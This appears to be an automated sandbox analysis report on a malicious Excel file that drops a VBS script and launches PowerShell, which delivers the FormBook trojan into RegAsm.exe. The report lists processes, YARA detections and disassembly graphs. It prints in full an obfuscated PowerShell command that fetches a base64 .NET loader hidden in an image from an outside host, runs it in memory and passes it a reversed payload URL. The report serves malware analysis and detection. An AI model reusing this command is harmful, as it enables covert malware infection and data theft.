                2024-07-02 05:53:44 UTC682INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 09 09 09 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 09 09 09 09 3c 68 65 61 64 3e 0d 0a 09 09 09 09 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 09 09 09 09 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 09 09 20 20 20 20 3c 6c 69
                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1" /> <title>Error 405</title> <li
                2024-07-02 05:53:44 UTC1038INData Raw: 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 7d 68 31 20 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 63 6f 6c 6f 72 3a 23 46 46 30 33 37 41 7d 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 38 30 61 32 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 64 6f 74 74 65 64 20 31 70 78 20 23 37 30 37 30 37 30 7d 2e 6c 65 61 64 7b 63 6f 6c 6f 72 3a 23 37 34 37 36 38 39 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 31 70 78 3b 6c 69 6e
                Data Ascii: family:inherit;font-weight:700;line-height:1.1;color:inherit;font-size:36px}h1 small{font-weight:700;line-height:1;color:#FF037A}a{text-decoration:none;color:#080a20;font-size:inherit;border-bottom:dotted 1px #707070}.lead{color:#747689;font-size:21px;lin


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:01:52:00
                Start date:02/07/2024
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Imagebase:0x13f660000
                File size:28'253'536 bytes
                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:4
                Start time:01:52:26
                Start date:02/07/2024
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                Imagebase:0x13fbc0000
                File size:1'423'704 bytes
                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:7
                Start time:01:52:46
                Start date:02/07/2024
                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Wow64 process (32bit):true
                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Imagebase:0x400000
                File size:543'304 bytes
                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:9
                Start time:01:52:47
                Start date:02/07/2024
                Path:C:\Windows\SysWOW64\wscript.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"
                Imagebase:0xa30000
                File size:141'824 bytes
                MD5 hash:979D74799EA6C8B8167869A68DF5204A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:10
                Start time:01:52:48
                Start date:02/07/2024
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"
                Imagebase:0xed0000
                File size:427'008 bytes
                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:12
                Start time:01:52:54
                Start date:02/07/2024
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Imagebase:0xf50000
                File size:64'704 bytes
                MD5 hash:8FE9545E9F72E460723F484C304314AD
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                Reputation:moderate
                Has exited:true

                Target ID:13
                Start time:01:53:12
                Start date:02/07/2024
                Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                Imagebase:0x1310000
                File size:2'525'680 bytes
                MD5 hash:2F8D93826B8CBF9290BC57535C7A6817
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Call Graph

                • Entrypoint
                • Decryption Function
                • Executed
                • Not Executed
                • Show Help
                callgraph 1 Error: Graph is empty

                Module: Sheet1

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet1"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: Sheet2

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet2"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: Sheet3

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet3"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: ThisWorkbook

                Declaration
                LineContent
                1

                Attribute VB_Name = "ThisWorkbook"

                2

                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Reset < >

                  Execution Graph

                  Execution Coverage:19.9%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:63.4%
                  Total number of Nodes:41
                  Total number of Limit Nodes:4
                  execution_graph 247 3640805 GetPEB 248 3640813 247->248 249 36406e5 250 36406e7 249->250 253 36406fa LoadLibraryW 250->253 258 3640714 253->258 259 3640717 258->259 260 3640725 259->260 262 36407ab URLDownloadToFileW 259->262 272 36407c4 262->272 267 36407d3 ShellExecuteW 287 36407fe 267->287 269 36407f2 270 3640838 269->270 271 3640801 ExitProcess 269->271 270->260 273 36407c6 272->273 274 36407cb 273->274 275 36407d9 3 API calls 273->275 276 36407d3 ShellExecuteW 274->276 279 36407b4 274->279 275->274 277 36407fe ExitProcess 276->277 278 36407f2 277->278 278->279 280 3640801 ExitProcess 278->280 281 36407d9 279->281 282 36407dc ShellExecuteW 281->282 283 36407fe ExitProcess 282->283 284 36407f2 282->284 283->284 285 36407cb 284->285 286 3640801 ExitProcess 284->286 285->267 285->270 288 3640801 ExitProcess 287->288 289 3640615 ExitProcess 294 364062e 289->294 295 3640634 294->295 300 364064a 295->300 301 3640650 300->301 306 3640671 301->306 307 3640674 306->307 310 36406e5 307->310 311 36406e7 310->311 312 36406fa 9 API calls 311->312 313 36406ec 312->313

                  Callgraph

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 36407ab-36407d1 URLDownloadToFileW call 36407c4 call 36407d9 6 36407d3-36407f5 ShellExecuteW call 36407fe 0->6 7 3640838-3640844 0->7 8 3640847 6->8 17 36407f7 6->17 7->8 10 364084f-3640853 8->10 11 3640849-364084d 8->11 13 3640855-3640859 10->13 14 3640868-364086a 10->14 11->10 16 364085b-3640862 11->16 13->14 13->16 20 364087a-364087b 14->20 18 3640864 16->18 19 3640866 16->19 17->14 21 36407f9-3640803 ExitProcess 17->21 18->14 22 364086c-3640875 19->22 25 3640877 22->25 26 364083e-3640841 22->26 25->20 26->22 28 3640843 26->28 28->8
                  APIs
                  • URLDownloadToFileW.URLMON(00000000,03640725,?,00000000,00000000), ref: 036407AD
                    • Part of subcall function 036407C4: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036407EB
                    • Part of subcall function 036407C4: ExitProcess.KERNEL32(00000000), ref: 03640803
                  Memory Dump Source
                  • Source File: 00000007.00000002.455415993.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_3640000_EQNEDT32.jbxd
                  Similarity
                  • API ID: DownloadExecuteExitFileProcessShell
                  • String ID:
                  • API String ID: 3584569557-0
                  • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                  • Instruction ID: 90b78033199664e10714064f0060d927effaa30934d1ae33df92af68db624213
                  • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                  • Instruction Fuzzy Hash: 7CF02764D8C3547DEB11E7740E8EF5AEE299F81B04F14088DF3464D4D3D8D48400CA5A

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 29 36407d9-36407eb ShellExecuteW 31 36407f2-36407f5 29->31 32 36407ed call 36407fe 29->32 34 3640847 31->34 35 36407f7 31->35 32->31 38 364084f-3640853 34->38 39 3640849-364084d 34->39 36 3640868-364086a 35->36 37 36407f9-3640803 ExitProcess 35->37 42 364087a-364087b 36->42 38->36 40 3640855-3640859 38->40 39->38 43 364085b-3640862 39->43 40->36 40->43 44 3640864 43->44 45 3640866 43->45 44->36 46 364086c-3640875 45->46 49 3640877 46->49 50 364083e-3640841 46->50 49->42 50->46 51 3640843 50->51 51->34
                  APIs
                  • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036407EB
                    • Part of subcall function 036407FE: ExitProcess.KERNEL32(00000000), ref: 03640803
                  Memory Dump Source
                  • Source File: 00000007.00000002.455415993.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_3640000_EQNEDT32.jbxd
                  Similarity
                  • API ID: ExecuteExitProcessShell
                  • String ID:
                  • API String ID: 1124553745-0
                  • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                  • Instruction ID: b6916cf52b93c86ffb48eebcb4d13d96c9672224cf903e86d1b528ba28654723
                  • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                  • Instruction Fuzzy Hash: 74017658E64372ACDF30E6284F09BB6EA06DB81700FCC4D06EF8408085D08480C3C6DA

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 52 36407c4-36407c6 54 36407cb-36407d1 52->54 55 36407c6 call 36407d9 52->55 56 36407d3-36407f5 ShellExecuteW call 36407fe 54->56 57 3640838-3640844 54->57 55->54 58 3640847 56->58 67 36407f7 56->67 57->58 60 364084f-3640853 58->60 61 3640849-364084d 58->61 63 3640855-3640859 60->63 64 3640868-364086a 60->64 61->60 66 364085b-3640862 61->66 63->64 63->66 70 364087a-364087b 64->70 68 3640864 66->68 69 3640866 66->69 67->64 71 36407f9-3640803 ExitProcess 67->71 68->64 72 364086c-3640875 69->72 75 3640877 72->75 76 364083e-3640841 72->76 75->70 76->72 78 3640843 76->78 78->58
                  Memory Dump Source
                  • Source File: 00000007.00000002.455415993.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_3640000_EQNEDT32.jbxd
                  Similarity
                  • API ID: ExecuteExitProcessShell
                  • String ID:
                  • API String ID: 1124553745-0
                  • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                  • Instruction ID: a9694c094d5d48b5e95c6b7cdf58580fc8222e65ea173cce193aadecf4306cb6
                  • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                  • Instruction Fuzzy Hash: D2017D34D58369BCEF70E3340F88B9EEE85EF81B14FA8495EFB4508081D2848583C69E

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 79 36406fa-36406fc LoadLibraryW call 3640714 81 3640701-3640706 79->81 82 3640776-36407a5 81->82 83 3640708-3640773 call 36407ab 81->83 83->82
                  APIs
                  • LoadLibraryW.KERNEL32(036406EC), ref: 036406FA
                  Memory Dump Source
                  • Source File: 00000007.00000002.455415993.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_3640000_EQNEDT32.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 2e4ae3c9308ced88479b18da207249d7968aee637c8f4c5ae4d2cad7d4017b4c
                  • Instruction ID: 3e64bb09765b203b5e66d8a6f50cc39fbcf1de36444cd6f0b147c70d37e6df64
                  • Opcode Fuzzy Hash: 2e4ae3c9308ced88479b18da207249d7968aee637c8f4c5ae4d2cad7d4017b4c
                  • Instruction Fuzzy Hash: 2021999294C7D61FDB1793704E7EA11FF602A23004B5DCACFC5C60A9A3E389A112DB97

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 92 36407fe-3640803 ExitProcess
                  APIs
                  • ExitProcess.KERNEL32(00000000), ref: 03640803
                  Memory Dump Source
                  • Source File: 00000007.00000002.455415993.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_3640000_EQNEDT32.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                  • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                  • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                  • Instruction Fuzzy Hash:

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 94 3640805-3640810 GetPEB 95 3640813-3640824 call 364082d 94->95 98 3640826-364082a 95->98
                  Memory Dump Source
                  • Source File: 00000007.00000002.455415993.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_3640000_EQNEDT32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                  • Instruction ID: effa46a9f6c45d9ce42981cd9e1be73d4d082d90772db74a0765fbab3f60623d
                  • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                  • Instruction Fuzzy Hash: 44D05271A026028FC704DB04CA80E52F36AFFC8210B28C268E2004B729C330E892CAD4

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 99 3640615-364063c ExitProcess call 364062e 102 364068f-36406ab 99->102 103 364063f 99->103 110 36406ac-36406af 102->110 105 36406b0-36406b8 103->105 106 3640641-3640644 103->106 111 36406bc-36406db 105->111 109 3640647 106->109 106->110 109->111 112 3640649-3640667 109->112 110->105 119 36406df-36406e3 111->119 112->111 120 3640669 112->120 121 36406dd 120->121 122 364066b-364068c call 36406e5 120->122 121->119 122->102
                  APIs
                  • ExitProcess.KERNEL32(03640603), ref: 03640615
                  Memory Dump Source
                  • Source File: 00000007.00000002.455415993.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_3640000_EQNEDT32.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: cf86fb58daf6fa3ce4011252a14b5b64c57c9d7d8bceb2748b4903e75b949068
                  • Instruction ID: 3cd78f58cd95eef65677c0b8446ee852a60bf5086653ddb9e2dd9de1c74b56ad
                  • Opcode Fuzzy Hash: cf86fb58daf6fa3ce4011252a14b5b64c57c9d7d8bceb2748b4903e75b949068
                  • Instruction Fuzzy Hash: 19215596C0E7E01FCB12E7741A6E422FF6079A300471D86CFC2DA0E9A3E3498126D396

                  Execution Graph

                  Execution Coverage:10.7%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0%
                  Total number of Nodes:276
                  Total number of Limit Nodes:21
                  execution_graph 9940 2a6658 9942 2a666e 9940->9942 9941 2a66c9 9942->9941 9961 2a8ed9 9942->9961 9966 2a907a 9942->9966 9970 2a8f65 9942->9970 9975 2a8f05 9942->9975 9980 2a8f61 9942->9980 9985 2a8f01 9942->9985 9990 2a8eef 9942->9990 9995 2a8e8f 9942->9995 10001 2a8f69 9942->10001 10006 2a8f09 9942->10006 10011 2a8f35 9942->10011 10016 2a8ed5 9942->10016 10021 2a8f31 9942->10021 10026 2a8ed1 9942->10026 10031 2a8f50 9942->10031 10036 2a8f1f 9942->10036 10041 2a8ebf 9942->10041 10046 2a8f39 9942->10046 9962 2a8edd 9961->9962 9963 2a8f86 9962->9963 10051 2aa5d1 9962->10051 9963->9942 9967 2a907c 9966->9967 9969 2aa5d1 8 API calls 9967->9969 9968 2a91ff 9968->9942 9969->9968 9971 2a8f6d 9970->9971 9972 2a906e 9971->9972 9974 2aa5d1 8 API calls 9971->9974 9972->9942 9973 2a91ff 9973->9942 9974->9973 9977 2a8f0d 9975->9977 9976 2a8f86 9976->9942 9977->9976 9979 2aa5d1 8 API calls 9977->9979 9978 2a91ff 9978->9942 9979->9978 9981 2a8f6d 9980->9981 9982 2a906e 9981->9982 9984 2aa5d1 8 API calls 9981->9984 9982->9942 9983 2a91ff 9983->9942 9984->9983 9987 2a8f0d 9985->9987 9986 2a8f86 9986->9942 9987->9986 9989 2aa5d1 8 API calls 9987->9989 9988 2a91ff 9988->9942 9989->9988 9991 2a8ef4 9990->9991 9992 2a8f86 9991->9992 9994 2aa5d1 8 API calls 9991->9994 9992->9942 9993 2a91ff 9993->9942 9994->9993 9996 2a8e96 9995->9996 9998 2a8ef4 9995->9998 9997 2a8f86 9997->9942 9998->9997 10000 2aa5d1 8 API calls 9998->10000 9999 2a91ff 9999->9942 10000->9999 10002 2a8f6d 10001->10002 10003 2a906e 10002->10003 10005 2aa5d1 8 API calls 10002->10005 10003->9942 10004 2a91ff 10004->9942 10005->10004 10008 2a8f0d 10006->10008 10007 2a8f86 10007->9942 10008->10007 10010 2aa5d1 8 API calls 10008->10010 10009 2a91ff 10009->9942 10010->10009 10013 2a8f3d 10011->10013 10012 2a8f86 10012->9942 10013->10012 10015 2aa5d1 8 API calls 10013->10015 10014 2a91ff 10014->9942 10015->10014 10018 2a8edd 10016->10018 10017 2a8f86 10017->9942 10018->10017 10020 2aa5d1 8 API calls 10018->10020 10019 2a91ff 10019->9942 10020->10019 10022 2a8f3d 10021->10022 10023 2a8f86 10022->10023 10025 2aa5d1 8 API calls 10022->10025 10023->9942 10024 2a91ff 10024->9942 10025->10024 10027 2a8edd 10026->10027 10028 2a8f86 10027->10028 10030 2aa5d1 8 API calls 10027->10030 10028->9942 10029 2a91ff 10029->9942 10030->10029 10033 2a8f28 10031->10033 10032 2a8f86 10032->9942 10033->10032 10035 2aa5d1 8 API calls 10033->10035 10034 2a91ff 10034->9942 10035->10034 10038 2a8f24 10036->10038 10037 2a8f86 10037->9942 10038->10037 10040 2aa5d1 8 API calls 10038->10040 10039 2a91ff 10039->9942 10040->10039 10042 2a8ec3 10041->10042 10043 2a8f86 10042->10043 10045 2aa5d1 8 API calls 10042->10045 10043->9942 10044 2a91ff 10044->9942 10045->10044 10047 2a8f3d 10046->10047 10048 2a8f86 10047->10048 10050 2aa5d1 8 API calls 10047->10050 10048->9942 10049 2a91ff 10049->9942 10050->10049 10053 2aa505 10051->10053 10052 2a91ff 10052->9942 10053->10051 10053->10052 10080 2aabaa 10053->10080 10084 2ab3d5 10053->10084 10090 2aac55 10053->10090 10095 2ab194 10053->10095 10100 2ab416 10053->10100 10105 2ab893 10053->10105 10110 2ab51d 10053->10110 10115 2aae1e 10053->10115 10120 2ab25e 10053->10120 10128 2ab59b 10053->10128 10133 2ab644 10053->10133 10138 2ab484 10053->10138 10143 2aa844 10053->10143 10148 2ab309 10053->10148 10153 2aaecb 10053->10153 10158 2aae8a 10053->10158 10166 2ab9b4 10053->10166 10171 2aba76 10053->10171 10178 2ab4bd 10053->10178 10182 2ab73c 10053->10182 10190 2aacff 10053->10190 10195 2aaf79 10053->10195 10200 2aae3a 10053->10200 10208 2ab1e5 10053->10208 10213 2ab367 10053->10213 10219 2ab5e7 10053->10219 10224 2a9c78 10080->10224 10228 2a9c71 10080->10228 10081 2aabde 10085 2ab3db 10084->10085 10232 2ac2f8 10085->10232 10237 2ac2e7 10085->10237 10242 2ac2a9 10085->10242 10086 2ab3ed 10091 2aa83a 10090->10091 10091->10090 10093 2a9c78 WriteProcessMemory 10091->10093 10094 2a9c71 WriteProcessMemory 10091->10094 10092 2aba4d 10092->10053 10093->10092 10094->10092 10096 2aa83a 10095->10096 10098 2a9c78 WriteProcessMemory 10096->10098 10099 2a9c71 WriteProcessMemory 10096->10099 10097 2aba4d 10097->10053 10098->10097 10099->10097 10101 2aa83a 10100->10101 10103 2a9c78 WriteProcessMemory 10101->10103 10104 2a9c71 WriteProcessMemory 10101->10104 10102 2aba4d 10102->10053 10103->10102 10104->10102 10106 2aa83a 10105->10106 10106->10105 10108 2a9c78 WriteProcessMemory 10106->10108 10109 2a9c71 WriteProcessMemory 10106->10109 10107 2aba4d 10107->10053 10108->10107 10109->10107 10111 2aa83a 10110->10111 10113 2a9c78 WriteProcessMemory 10111->10113 10114 2a9c71 WriteProcessMemory 10111->10114 10112 2aba4d 10112->10053 10113->10112 10114->10112 10116 2aa83a 10115->10116 10118 2a9c78 WriteProcessMemory 10116->10118 10119 2a9c71 WriteProcessMemory 10116->10119 10117 2aba4d 10117->10053 10118->10117 10119->10117 10121 2ab268 10120->10121 10256 2ac330 10121->10256 10261 2ac340 10121->10261 10122 2aa83a 10126 2a9c78 WriteProcessMemory 10122->10126 10127 2a9c71 WriteProcessMemory 10122->10127 10123 2aba4d 10123->10053 10126->10123 10127->10123 10129 2aa83a 10128->10129 10131 2a9c78 WriteProcessMemory 10129->10131 10132 2a9c71 WriteProcessMemory 10129->10132 10130 2aba4d 10130->10053 10131->10130 10132->10130 10134 2aa83a 10133->10134 10136 2a9c78 WriteProcessMemory 10134->10136 10137 2a9c71 WriteProcessMemory 10134->10137 10135 2aba4d 10135->10053 10136->10135 10137->10135 10139 2aa83a 10138->10139 10141 2a9c78 WriteProcessMemory 10139->10141 10142 2a9c71 WriteProcessMemory 10139->10142 10140 2aba4d 10140->10053 10141->10140 10142->10140 10144 2aa83a 10143->10144 10146 2a9c78 WriteProcessMemory 10144->10146 10147 2a9c71 WriteProcessMemory 10144->10147 10145 2aba4d 10145->10053 10146->10145 10147->10145 10149 2aa83a 10148->10149 10151 2a9c78 WriteProcessMemory 10149->10151 10152 2a9c71 WriteProcessMemory 10149->10152 10150 2aba4d 10150->10053 10151->10150 10152->10150 10154 2aa83a 10153->10154 10156 2a9c78 WriteProcessMemory 10154->10156 10157 2a9c71 WriteProcessMemory 10154->10157 10155 2aba4d 10155->10053 10156->10155 10157->10155 10159 2aae60 10158->10159 10160 2aa83a 10159->10160 10164 2ac330 2 API calls 10159->10164 10165 2ac340 2 API calls 10159->10165 10162 2a9c78 WriteProcessMemory 10160->10162 10163 2a9c71 WriteProcessMemory 10160->10163 10161 2aba4d 10161->10053 10162->10161 10163->10161 10164->10160 10165->10160 10167 2aa83a 10166->10167 10169 2a9c78 WriteProcessMemory 10167->10169 10170 2a9c71 WriteProcessMemory 10167->10170 10168 2aba4d 10168->10053 10169->10168 10170->10168 10274 2aa010 10171->10274 10278 2aa005 10171->10278 10172 2aa83a 10174 2a9c78 WriteProcessMemory 10172->10174 10175 2a9c71 WriteProcessMemory 10172->10175 10173 2aba4d 10173->10053 10174->10173 10175->10173 10180 2a9c78 WriteProcessMemory 10178->10180 10181 2a9c71 WriteProcessMemory 10178->10181 10179 2ab4e7 10180->10179 10181->10179 10183 2ab284 10182->10183 10184 2aa83a 10182->10184 10186 2ac330 2 API calls 10183->10186 10187 2ac340 2 API calls 10183->10187 10188 2a9c78 WriteProcessMemory 10184->10188 10189 2a9c71 WriteProcessMemory 10184->10189 10185 2aba4d 10185->10053 10186->10184 10187->10184 10188->10185 10189->10185 10191 2aba26 10190->10191 10193 2a9c78 WriteProcessMemory 10191->10193 10194 2a9c71 WriteProcessMemory 10191->10194 10192 2aba4d 10192->10053 10193->10192 10194->10192 10196 